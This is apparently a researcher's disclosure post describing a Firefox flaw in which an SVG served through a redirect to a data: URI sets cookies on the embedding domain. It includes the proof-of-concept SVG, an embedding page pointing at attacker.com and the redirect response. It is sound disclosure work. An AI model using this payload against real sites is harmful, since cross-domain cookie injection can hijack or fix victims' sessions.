Firefox SVG cross domain cookie vulnerability
Posted on 30 November -0001
<HTML><HEAD><TITLE>Firefox SVG cross domain cookie vulnerability</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>I recently read that browsers allow to use meta tags to set cookies. I am not sure if I just forgot about this feature or never used it before. As I played with SVG in the past I decided to give it a try. The SVG standard does not include the meta tag but it supports the foreignobject tag: The <foreignObject> SVG element allows for inclusion of a foreign XML namespace which has its graphical content drawn by a different user agent. An simple example taken from mdn shows how to use the XHTML namespace inside a SVG file: <foreignObject width="100" height="50" requiredExtensions="http://www.w3.org/1999/xhtml"> <!-- XHTML content goes here --> <body xmlns="http://www.w3.org/1999/xhtml"> <p>Here is a paragraph that requires word wrap</p> </body> </foreignObject> Setting the cookie I adapted the example and pointed the Browser to the following SVG: <svg xmlns='http://www.w3.org/2000/svg'> <circle r='100'> </circle> <foreignObject> <html xmlns='http://www.w3.org/1999/xhtml'> <meta http-equiv='Set-Cookie' content='ppp=qqq' /> </html> </foreignObject> </svg> The hosting domain now has a cookie ppp=qqq. The next step was to try, what will happen if another domain is loading this SVG file: // Domain: http://example.com <!DOCTYPE html> <body> <img src="http://attacker.com/cookie.svg"> </body> Sadly the cookie was set for attacker.com, not for example.com. Redirects + data uris The final trick to make things work was to use the data: protocol handler and redirects. Assume the following code on the domain example.com <!DOCTYPE html> <body> <img src="http://attacker.com/cookie"> </body> The webserver at attacker.com uses the following response code: HTTP 302 Found Location: data:image/svg+xml,<svg xmlns='http://www.w3.org/2000/svg'><circle r='100'></circle><foreignObject><html xmlns='http://www.w3.org/1999/xhtml'><meta http-equiv='Set-Cookie' content='ppp=qqq' /></html></foreignObject></svg> As soon as I opened this test case in Firefox, a cookie was set for example.com. This can introduce a lot of different vulnerabilities for web pages, which allow to include images from external/third party sites. Another issue popped up during the investigation of the issue via the firefox team, which can be read here as soon it is public: https://bugzilla.mozilla.org/show_bug.cgi?id=1317641#c20 The bug bounty decision is still in progress. I have to thank my Cure53 mates, who helped playing with this vulnerability (especially Masato) :) </BODY></HTML>